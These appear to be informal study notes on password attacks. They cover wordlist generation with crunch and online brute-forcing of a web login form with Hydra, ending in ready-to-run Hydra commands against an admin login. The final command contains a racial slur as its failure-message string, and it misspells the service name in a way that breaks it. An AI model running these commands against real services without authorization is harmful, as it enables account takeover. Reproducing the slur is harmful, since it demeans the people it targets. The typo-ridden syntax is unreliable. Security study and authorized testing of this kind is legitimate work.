Definition :
Brute Force Attack :
Using all forms of combinations to crack a password / username, usually good if password has few characters / digits
Dictionary attack :
Using a wordlist ( custom or downloaded ) and trying every single password from wordlist
Creating a wordlist using crunch :
Use - crunch [min length] [max length] [characters to be used] -o [file name] -t [pattern]
Note : -t is optional and used if we want certain letters / digits in wordist
Ex 1 : crunch 4 4 123abc$ -o wordlist.txt -t a@@b
Ex 2 : crunch 4 6 12abc$ -o wordlist.txt
Using Hydra to brute force :
hydra -h - for all commands
Basic Syntax : hydra (thier ip) -l (username name) -P (file location consisting of wordlist) service_type “service”
Note : use -L (location of file containing username wordlist
I used http-post-form service_type cause I did inspect element and checked it to be post
for service do : hydra -U http-post-form, A long description should come
Generally : service consists of 3 parts each separated by : being :
-
Rest of the URL excluding ip
-
(username_variable)=^USER^&(password_variable)=^PASS^ ( other stuff )
Note : to find username and password use burp suite proxy to intercept go to headers section and also copy paste if anything besides variables is there
- F = (message appearing when wrong password)
Final Code Example :
hydra IP or Domain name -l admin -P /root/test.txt http-post-form " Login Page Path : username=^USER^&password=^PASS^&login-php-submit-button=Login : F=Not Logged In "
Or
hydra -l admin -P rockyou.txt -f target.com -s (port) htp-post-form "/login.php:username=^USER^&password=^PASS^:wrong password nigga." -t 64 -IV